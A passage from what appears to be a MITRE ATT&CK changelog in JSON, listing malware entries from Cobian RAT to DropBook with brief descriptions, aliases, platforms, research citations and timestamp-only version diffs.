Retrieved November 13, 2018.", + "url": "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cobian RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:21.097000+00:00\", \"old_value\": \"2025-04-16 20:38:29.365000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d1531eaa-9e17-473e-a680-3298469662c3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-04-23 18:41:36.914000+00:00", + "modified": "2025-04-25 14:44:45.121000+00:00", + "name": "CoinTicker", + "description": "[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0369", + "external_id": "S0369" + }, + { + "source_name": "CoinTicker 2019", + "description": "Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. 
Retrieved April 23, 2019.", + "url": "https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CoinTicker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Richie Cyrus, SpecterOps" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:45.121000+00:00\", \"old_value\": \"2025-04-16 20:38:36.473000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:45:04.669000+00:00", + "name": "Comnie", + "description": "[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0244", + "external_id": "S0244" + }, + { + "source_name": "Comnie", + "description": "(Citation: Palo Alto Comnie)" + }, + { + "source_name": "Palo Alto Comnie", + "description": "Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. 
Retrieved June 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Comnie" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:04.669000+00:00\", \"old_value\": \"2025-04-16 20:38:43.241000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--2eb9b131-d333-4a48-9eb4-d8dec46c19ee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:36.550000+00:00", + "modified": "2025-04-25 14:42:57.253000+00:00", + "name": "CosmicDuke", + "description": "[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0050", + "external_id": "S0050" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. 
Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CosmicDuke", + "TinyBaron", + "BotgenStudios", + "NemesisGemina" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:57.253000+00:00\", \"old_value\": \"2025-04-16 20:38:00.812000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--925a6c52-5cf0-4fec-99de-b0d6917d8593", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-04 20:43:50.481000+00:00", + "modified": "2025-04-25 14:44:04.068000+00:00", + "name": "Crutch", + "description": "[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0538", + "external_id": "S0538" + }, + { + "source_name": "ESET Crutch December 2020", + "description": "Faou, M. (2020, December 2). Turla Crutch: Keeping the \u201cback door\u201d open. 
Retrieved December 4, 2020.", + "url": "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Crutch" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:04.068000+00:00\", \"old_value\": \"2025-04-16 20:38:23.296000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-08-10 14:26:12.369000+00:00", + "modified": "2025-04-25 14:44:14.409000+00:00", + "name": "Cryptoistic", + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0498", + "external_id": "S0498" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. 
Retrieved August 7, 2020.", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cryptoistic" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:14.409000+00:00\", \"old_value\": \"2025-04-16 20:38:27.529000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6cd07296-14aa-403d-9229-6343d03d4752", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-18 22:05:58.411000+00:00", + "modified": "2025-04-25 14:43:42.282000+00:00", + "name": "Cuba", + "description": "\n[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0625", + "external_id": "S0625" + }, + { + "source_name": "Cuba", + "description": "(Citation: McAfee Cuba April 2021)" + }, + { + "source_name": "McAfee Cuba April 2021", + "description": "Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. 
Retrieved June 18, 2021.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cuba" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:42.282000+00:00\", \"old_value\": \"2025-04-16 20:38:15.861000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6de9cad1-eed2-4e27-b0b5-39fa29349ea0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-02 15:48:55.838000+00:00", + "modified": "2025-04-25 14:43:42.648000+00:00", + "name": "DEATHRANSOM", + "description": "[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0616", + "external_id": "S0616" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. 
Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DEATHRANSOM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:42.648000+00:00\", \"old_value\": \"2025-04-16 20:38:16.017000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--53ab35c2-d00e-491a-8753-41d35ae7e547", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 19:18:28.468000+00:00", + "modified": "2025-04-25 14:43:20.605000+00:00", + "name": "DarkComet", + "description": "[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0334", + "external_id": "S0334" + }, + { + "source_name": "DarkComet", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "DarkKomet", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "Fynloski", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "Krademok", + "description": "(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "FYNLOS", + "description": 
"(Citation: TrendMicro DarkComet Sept 2014)" + }, + { + "source_name": "TrendMicro DarkComet Sept 2014", + "description": "TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET" + }, + { + "source_name": "Malwarebytes DarkComet March 2018", + "description": "Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DarkComet", + "DarkKomet", + "Fynloski", + "Krademok", + "FYNLOS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:20.605000+00:00\", \"old_value\": \"2025-04-16 20:38:08.057000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6f6f67c9-556d-4459-95c2-78d272190e52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2024-02-09 19:52:30.428000+00:00", + "modified": "2025-04-22 22:18:48.564000+00:00", + "name": "DarkGate", + "description": "[DarkGate](https://attack.mitre.org/software/S1111) first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. 
Written in Delphi and named \"DarkGate\" by its author, [DarkGate](https://attack.mitre.org/software/S1111) is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.(Citation: Ensilo Darkgate 2018) DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.(Citation: Trellix Darkgate 2023)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1111", + "external_id": "S1111" + }, + { + "source_name": "Ensilo Darkgate 2018", + "description": "Adi Zeligson & Rotem Kerner. (2018, November 13). Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign. Retrieved February 9, 2024.", + "url": "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign" + }, + { + "source_name": "Trellix Darkgate 2023", + "description": "Ernesto Fern\u00e1ndez Provecho, Pham Duy Phuc, Ciana Driscoll & Vinoo Thomas. (2023, November 21). The Continued Evolution of the DarkGate Malware-as-a-Service. 
Retrieved February 9, 2024.", + "url": "https://www.trellix.com/blogs/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DarkGate" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Serhii Melnyk, Trustwave SpiderLabs", + "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:18:48.564000+00:00\", \"old_value\": \"2024-09-29 10:22:45.776000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd\", \"old_value\": \"Phyo Paing Htun (ChiLai)\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b6b3dfc7-9a81-43ff-ac04-698bad48973a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:29.509000+00:00", + "name": "Daserf", + "description": "[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. 
(Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0187", + "external_id": "S0187" + }, + { + "source_name": "Daserf", + "description": "(Citation: Trend Micro Daserf Nov 2017)" + }, + { + "source_name": "Muirim", + "description": "(Citation: Trend Micro Daserf Nov 2017)" + }, + { + "source_name": "Nioupale", + "description": "(Citation: Trend Micro Daserf Nov 2017)" + }, + { + "source_name": "Trend Micro Daserf Nov 2017", + "description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER\u2019s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + }, + { + "source_name": "Secureworks BRONZE BUTLER Oct 2017", + "description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. 
Retrieved January 4, 2018.", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Daserf", + "Muirim", + "Nioupale" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:29.509000+00:00\", \"old_value\": \"2025-04-16 20:38:31.680000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--8f460983-1bbb-4e7e-8094-f0b5e720f658", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:02.087000+00:00", + "name": "DealersChoice", + "description": "[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0243", + "external_id": "S0243" + }, + { + "source_name": "DealersChoice", + "description": "(Citation: Sofacy DealersChoice)" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. 
Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DealersChoice" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:02.087000+00:00\", \"old_value\": \"2025-04-16 20:38:22.471000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--e170995d-4f61-4f17-b60e-04f9a06ee517", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:54.842000+00:00", + "name": "Dipsind", + "description": "[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0200", + "external_id": "S0200" + }, + { + "source_name": "Dipsind", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. 
Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dipsind" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:54.842000+00:00\", \"old_value\": \"2025-04-16 20:38:39.512000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4f1c389e-a80e-4a3e-9b0e-9be8c91df64f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-06 15:53:34.722000+00:00", + "modified": "2025-04-25 14:43:17.148000+00:00", + "name": "Doki", + "description": "[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0600", + "external_id": "S0600" + }, + { + "source_name": "Intezer Doki July 20", + "description": "Fishbein, N., Kajiloti, M.. (2020, July 28). 
Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.", + "url": "https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Doki" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Containers" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:17.148000+00:00\", \"old_value\": \"2025-04-16 20:38:06.758000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:56.608000+00:00", + "name": "DownPaper", + "description": "[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0186", + "external_id": "S0186" + }, + { + "source_name": "DownPaper", + "description": "(Citation: ClearSky Charming Kitten Dec 2017)" + }, + { + "source_name": "ClearSky Charming Kitten Dec 2017", + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. 
Retrieved December 27, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DownPaper" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:56.608000+00:00\", \"old_value\": \"2025-04-16 20:38:40.332000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--08d20cd2-f084-45ee-8558-fa6ef5a18519", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:16.790000+00:00", + "modified": "2025-04-25 14:42:36.848000+00:00", + "name": "Downdelph", + "description": "[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0134", + "external_id": "S0134" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. 
Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Downdelph", + "Delphacy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:36.848000+00:00\", \"old_value\": \"2025-04-16 20:37:53.960000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--3ae6097d-d700-46c6-8b21-42fc0bcb48fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-22 18:36:12.214000+00:00", + "modified": "2025-04-25 14:43:03.619000+00:00", + "name": "DropBook", + "description": "[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)", + "revoked": false, + "labels": [ + "malware" 